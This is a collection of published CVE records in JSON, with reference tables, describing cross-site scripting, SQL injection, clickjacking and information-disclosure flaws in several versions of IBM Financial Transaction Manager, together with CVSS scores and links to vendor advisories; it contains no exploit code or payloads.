{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T08:14:59.120Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6371260" }, { "name": "ibm-ftm-cve20204906-info-disc (191110)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/191110" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Financial Transaction Manager", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.2.4" } ] } ], "datePublic": "2020-12-15T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM Financial Transaction Manager for SWIFT Services for Multiplatforms 3.2.4 allows web pages to be stored locally which can be read by another user on the system." } ], "metrics": [ { "cvssV3_0": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "exploitCodeMaturity": "UNPROVEN", "integrityImpact": "NONE", "privilegesRequired": "NONE", "remediationLevel": "OFFICIAL_FIX", "reportConfidence": "CONFIRMED", "scope": "UNCHANGED", "temporalScore": 3.5, "temporalSeverity": "LOW", "userInteraction": "NONE", "vectorString": "CVSS:3.0/PR:N/C:L/A:N/I:N/UI:N/AV:L/AC:L/S:U/E:U/RC:C/RL:O", "version": "3.0" } } ], "problemTypes": [ { "descriptions": [ { "description": "Obtain Information", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2020-12-16T20:35:28", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.ibm.com/support/pages/node/6371260" }, { "name": "ibm-ftm-cve20204906-info-disc (191110)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/191110" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2020-12-15T00:00:00", "ID": "CVE-2020-4906", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Financial Transaction Manager", "version": { "version_data": [ { "version_value": "3.2.4" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM Financial Transaction Manager for SWIFT Services for Multiplatforms 3.2.4 allows web pages to be stored locally which can be read by another user on the system." } ] }, "impact": { "cvssv3": { "BM": { "A": "N", "AC": "L", "AV": "L", "C": "L", "I": "N", "PR": "N", "S": "U", "UI": "N" }, "TM": { "E": "U", "RC": "C", "RL": "O" } } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Obtain Information" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.ibm.com/support/pages/node/6371260", "refsource": "CONFIRM", "title": "IBM Security Bulletin 6371260 (Financial Transaction Manager)", "url": "https://www.ibm.com/support/pages/node/6371260" }, { "name": "ibm-ftm-cve20204906-info-disc (191110)", "refsource": "XF", "title": "X-Force Vulnerability Report", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/191110" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2020-4906", "datePublished": "2020-12-16T20:35:28.667615Z", "dateReserved": "2019-12-30T00:00:00", "dateUpdated": "2024-09-16T17:48:50.224Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2018-1390
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www.securityfocus.com/bid/103682 | vdb-entry, x_refsource_BID | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/138221 | x_refsource_MISC | |
http://www.ibm.com/support/docview.wss?uid=swg22014795 | x_refsource_CONFIRM |
Vendor | Product | Version | ||
---|---|---|---|---|
IBM | Financial Transaction Manager |
Version: 3.0 Version: 3.0.2 Version: 3.0.2.0 Version: 3.0.2.1 |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T03:59:38.629Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "103682", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/103682" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/138221" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=swg22014795" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Financial Transaction Manager", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.0" }, { "status": "affected", "version": "3.0.2" }, { "status": "affected", "version": "3.0.2.0" }, { "status": "affected", "version": "3.0.2.1" } ] } ], "datePublic": "2018-03-22T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM Financial Transaction Manager for Check Services for Multi-Platform 3.0, 3.0.2, and 3.0.2.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 138221." } ], "metrics": [ { "cvssV3_0": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/A:N/AC:L/AV:N/C:L/I:L/PR:L/S:C/UI:R", "version": "3.0" } } ], "problemTypes": [ { "descriptions": [ { "description": "Cross-Site Scripting", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2018-04-06T09:57:01", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "name": "103682", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/103682" }, { "tags": [ "x_refsource_MISC" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/138221" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://www.ibm.com/support/docview.wss?uid=swg22014795" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2018-03-22T00:00:00", "ID": "CVE-2018-1390", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Financial Transaction Manager", "version": { "version_data": [ { "version_value": "3.0" }, { "version_value": "3.0.2" }, { "version_value": "3.0.2.0" }, { "version_value": "3.0.2.1" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM Financial Transaction Manager for Check Services for Multi-Platform 3.0, 3.0.2, and 3.0.2.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 138221." } ] }, "impact": { "cvssv3": { "BM": { "A": "N", "AC": "L", "AV": "N", "C": "L", "I": "L", "PR": "L", "S": "C", "UI": "R" } } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Cross-Site Scripting" } ] } ] }, "references": { "reference_data": [ { "name": "103682", "refsource": "BID", "url": "http://www.securityfocus.com/bid/103682" }, { "name": "https://exchange.xforce.ibmcloud.com/vulnerabilities/138221", "refsource": "MISC", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/138221" }, { "name": "http://www.ibm.com/support/docview.wss?uid=swg22014795", "refsource": "CONFIRM", "url": "http://www.ibm.com/support/docview.wss?uid=swg22014795" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2018-1390", "datePublished": "2018-03-30T16:00:00Z", "dateReserved": "2017-12-13T00:00:00", "dateUpdated": "2024-09-16T18:55:18.191Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2019-4742
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/1135173 | x_refsource_CONFIRM | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/172877 | vdb-entry, x_refsource_XF |
Vendor | Product | Version | ||
---|---|---|---|---|
IBM | Financial Transaction Manager |
Version: 3.0 |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T19:40:49.183Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/1135173" }, { "name": "ibm-ftm-cve20194742-clickjacking (172877)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/172877" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Financial Transaction Manager", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.0" } ] } ], "datePublic": "2019-12-19T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM Financial Transaction Manager 3.0 could allow a remote attacker to hijack the clicking action of the victim. By persuading a victim to visit a malicious Web site, a remote attacker could exploit this vulnerability to hijack the victim\u0027s click actions and possibly launch further attacks against the victim. IBM X-Force ID: 172877." } ], "metrics": [ { "cvssV3_0": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "exploitCodeMaturity": "UNPROVEN", "integrityImpact": "LOW", "privilegesRequired": "NONE", "remediationLevel": "OFFICIAL_FIX", "reportConfidence": "CONFIRMED", "scope": "CHANGED", "temporalScore": 5.3, "temporalSeverity": "MEDIUM", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/I:L/PR:N/AV:N/AC:L/A:N/UI:R/S:C/C:L/RC:C/E:U/RL:O", "version": "3.0" } } ], "problemTypes": [ { "descriptions": [ { "description": "Gain Access", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2019-12-20T16:25:26", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.ibm.com/support/pages/node/1135173" }, { "name": "ibm-ftm-cve20194742-clickjacking (172877)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/172877" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2019-12-19T00:00:00", "ID": "CVE-2019-4742", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Financial Transaction Manager", "version": { "version_data": [ { "version_value": "3.0" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM Financial Transaction Manager 3.0 could allow a remote attacker to hijack the clicking action of the victim. By persuading a victim to visit a malicious Web site, a remote attacker could exploit this vulnerability to hijack the victim\u0027s click actions and possibly launch further attacks against the victim. IBM X-Force ID: 172877." } ] }, "impact": { "cvssv3": { "BM": { "A": "N", "AC": "L", "AV": "N", "C": "L", "I": "L", "PR": "N", "S": "C", "UI": "R" }, "TM": { "E": "U", "RC": "C", "RL": "O" } } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Gain Access" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.ibm.com/support/pages/node/1135173", "refsource": "CONFIRM", "title": "IBM Security Bulletin 1135173 (Financial Transaction Manager)", "url": "https://www.ibm.com/support/pages/node/1135173" }, { "name": "ibm-ftm-cve20194742-clickjacking (172877)", "refsource": "XF", "title": "X-Force Vulnerability Report", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/172877" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2019-4742", "datePublished": "2019-12-20T16:25:26.313896Z", "dateReserved": "2019-01-03T00:00:00", "dateUpdated": "2024-09-17T00:26:29.572Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2018-1670
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://exchange.xforce.ibmcloud.com/vulnerabilities/144946 | vdb-entry, x_refsource_XF | |
http://www.ibm.com/support/docview.wss?uid=ibm10731547 | x_refsource_CONFIRM | |
http://www.ibm.com/support/docview.wss?uid=ibm10731549 | x_refsource_CONFIRM |
Vendor | Product | Version | ||
---|---|---|---|---|
IBM | Financial Transaction Manager |
Version: 3.0.2 |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T04:07:44.080Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "ibm-ftm-cve20181670-info-disc(144946)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/144946" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=ibm10731547" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=ibm10731549" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Financial Transaction Manager", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.0.2" } ] } ], "datePublic": "2018-10-02T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM Financial Transaction Manager for ACH Services for Multi-Platform 3.0.2 could allow an authenticated user to obtain sensitive product configuration information from log files. IBM X-Force ID: 144946." } ], "metrics": [ { "cvssV3_0": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.1, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "exploitCodeMaturity": "UNPROVEN", "integrityImpact": "NONE", "privilegesRequired": "LOW", "remediationLevel": "OFFICIAL_FIX", "reportConfidence": "CONFIRMED", "scope": "UNCHANGED", "temporalScore": 2.7, "temporalSeverity": "LOW", "userInteraction": "NONE", "vectorString": "CVSS:3.0/A:N/AC:H/AV:N/C:L/I:N/PR:L/S:U/UI:N/E:U/RC:C/RL:O", "version": "3.0" } } ], "problemTypes": [ { "descriptions": [ { "description": "Obtain Information", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2018-10-04T14:57:01", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "name": "ibm-ftm-cve20181670-info-disc(144946)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/144946" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://www.ibm.com/support/docview.wss?uid=ibm10731547" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://www.ibm.com/support/docview.wss?uid=ibm10731549" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2018-10-02T00:00:00", "ID": "CVE-2018-1670", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Financial Transaction Manager", "version": { "version_data": [ { "version_value": "3.0.2" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM Financial Transaction Manager for ACH Services for Multi-Platform 3.0.2 could allow an authenticated user to obtain sensitive product configuration information from log files. IBM X-Force ID: 144946." } ] }, "impact": { "cvssv3": { "BM": { "A": "N", "AC": "H", "AV": "N", "C": "L", "I": "N", "PR": "L", "S": "U", "UI": "N" }, "TM": { "E": "U", "RC": "C", "RL": "O" } } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Obtain Information" } ] } ] }, "references": { "reference_data": [ { "name": "ibm-ftm-cve20181670-info-disc(144946)", "refsource": "XF", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/144946" }, { "name": "http://www.ibm.com/support/docview.wss?uid=ibm10731547", "refsource": "CONFIRM", "url": "http://www.ibm.com/support/docview.wss?uid=ibm10731547" }, { "name": "http://www.ibm.com/support/docview.wss?uid=ibm10731549", "refsource": "CONFIRM", "url": "http://www.ibm.com/support/docview.wss?uid=ibm10731549" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2018-1670", "datePublished": "2018-10-04T15:00:00Z", "dateReserved": "2017-12-13T00:00:00", "dateUpdated": "2024-09-17T01:06:09.597Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2020-4560
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6255190 | x_refsource_CONFIRM | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/183900 | vdb-entry, x_refsource_XF |
Vendor | Product | Version | ||
---|---|---|---|---|
IBM | Financial Transaction Manager |
Version: 3.2.4 |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T08:07:49.036Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6255190" }, { "name": "ibm-ftm-cve20204560-xss (183900)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/183900" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Financial Transaction Manager", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.2.4" } ] } ], "datePublic": "2020-07-31T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM Financial Transaction Manager 3.2.4 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session." } ], "metrics": [ { "cvssV3_0": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.7, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "exploitCodeMaturity": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "remediationLevel": "OFFICIAL_FIX", "reportConfidence": "CONFIRMED", "scope": "CHANGED", "temporalScore": 4.5, "temporalSeverity": "MEDIUM", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/C:L/AC:H/PR:N/AV:N/A:N/UI:R/I:L/S:C/E:H/RL:O/RC:C", "version": "3.0" } } ], "problemTypes": [ { "descriptions": [ { "description": "Cross-Site Scripting", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2020-08-03T12:35:41", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.ibm.com/support/pages/node/6255190" }, { "name": "ibm-ftm-cve20204560-xss (183900)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/183900" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2020-07-31T00:00:00", "ID": "CVE-2020-4560", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Financial Transaction Manager", "version": { "version_data": [ { "version_value": "3.2.4" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM Financial Transaction Manager 3.2.4 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session." } ] }, "impact": { "cvssv3": { "BM": { "A": "N", "AC": "H", "AV": "N", "C": "L", "I": "L", "PR": "N", "S": "C", "UI": "R" }, "TM": { "E": "H", "RC": "C", "RL": "O" } } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Cross-Site Scripting" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.ibm.com/support/pages/node/6255190", "refsource": "CONFIRM", "title": "IBM Security Bulletin 6255190 (Financial Transaction Manager)", "url": "https://www.ibm.com/support/pages/node/6255190" }, { "name": "ibm-ftm-cve20204560-xss (183900)", "refsource": "XF", "title": "X-Force Vulnerability Report", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/183900" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2020-4560", "datePublished": "2020-08-03T12:35:41.849120Z", "dateReserved": "2019-12-30T00:00:00", "dateUpdated": "2024-09-17T00:36:57.622Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2020-4556
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6962117 | vendor-advisory | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/183329 | vdb-entry |
Vendor | Product | Version | ||
---|---|---|---|---|
IBM | Financial Transaction Manager |
Version: 3.2.0 ≤ |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T08:07:48.911Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6962117" }, { "tags": [ "vdb-entry", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/183329" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "Financial Transaction Manager", "vendor": "IBM", "versions": [ { "lessThan": "3.2.10", "status": "affected", "version": "3.2.0", "versionType": "semver" } ] } ], "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "IBM Financial Transaction Manager for High Value Payments for Multi-Platform 3.2.0 through 3.2.10 allows web pages to be stored locally which can be read by another user on the system. IBM X-Force ID: 183329." } ], "value": "IBM Financial Transaction Manager for High Value Payments for Multi-Platform 3.2.0 through 3.2.10 allows web pages to be stored locally which can be read by another user on the system. IBM X-Force ID: 183329." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "description": "525 Information Exposure Through Browser Caching", "lang": "en" } ] } ], "providerMetadata": { "dateUpdated": "2023-03-15T18:56:17.737Z", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "vendor-advisory" ], "url": "https://www.ibm.com/support/pages/node/6962117" }, { "tags": [ "vdb-entry" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/183329" } ], "source": { "discovery": "UNKNOWN" }, "title": "IBM Financial Transaction Manager information disclosure", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2020-4556", "datePublished": "2023-03-15T18:56:17.737Z", "dateReserved": "2019-12-30T00:00:00.000Z", "dateUpdated": "2024-08-04T08:07:48.911Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2019-4032
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www.ibm.com/support/docview.wss?uid=ibm10869520 | x_refsource_CONFIRM | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/155998 | vdb-entry, x_refsource_XF |
Vendor | Product | Version | ||
---|---|---|---|---|
IBM | Financial Transaction Manager |
Version: 3.1.0 |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T19:26:27.944Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=ibm10869520" }, { "name": "ibm-ftm-cve20194032-sql-injection(155998)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/155998" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Financial Transaction Manager", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.1.0" } ] } ], "datePublic": "2019-01-31T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM Financial Transaction Manager for Digital Payments for Multi-Platform 3.1.0 is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-ForceID: 155998." } ], "metrics": [ { "cvssV3_0": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "exploitCodeMaturity": "UNPROVEN", "integrityImpact": "LOW", "privilegesRequired": "LOW", "remediationLevel": "OFFICIAL_FIX", "reportConfidence": "CONFIRMED", "scope": "UNCHANGED", "temporalScore": 5.5, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.0/A:L/AC:L/AV:N/C:L/I:L/PR:L/S:U/UI:N/E:U/RC:C/RL:O", "version": "3.0" } } ], "problemTypes": [ { "descriptions": [ { "description": "Data Manipulation", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2019-03-05T17:57:01", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "http://www.ibm.com/support/docview.wss?uid=ibm10869520" }, { "name": "ibm-ftm-cve20194032-sql-injection(155998)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/155998" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2019-01-31T00:00:00", "ID": "CVE-2019-4032", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Financial Transaction Manager", "version": { "version_data": [ { "version_value": "3.1.0" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM Financial Transaction Manager for Digital Payments for Multi-Platform 3.1.0 is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-ForceID: 155998." } ] }, "impact": { "cvssv3": { "BM": { "A": "L", "AC": "L", "AV": "N", "C": "L", "I": "L", "PR": "L", "S": "U", "UI": "N" }, "TM": { "E": "U", "RC": "C", "RL": "O" } } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Data Manipulation" } ] } ] }, "references": { "reference_data": [ { "name": "http://www.ibm.com/support/docview.wss?uid=ibm10869520", "refsource": "CONFIRM", "url": "http://www.ibm.com/support/docview.wss?uid=ibm10869520" }, { "name": "ibm-ftm-cve20194032-sql-injection(155998)", "refsource": "XF", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/155998" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2019-4032", "datePublished": "2019-03-05T18:00:00Z", "dateReserved": "2019-01-03T00:00:00", "dateUpdated": "2024-09-17T02:32:28.607Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2020-5003
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6462861 | x_refsource_CONFIRM | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/192956 | vdb-entry, x_refsource_XF |
Vendor | Product | Version | ||
---|---|---|---|---|
IBM | Financial Transaction Manager |
Version: 3.2.4 |
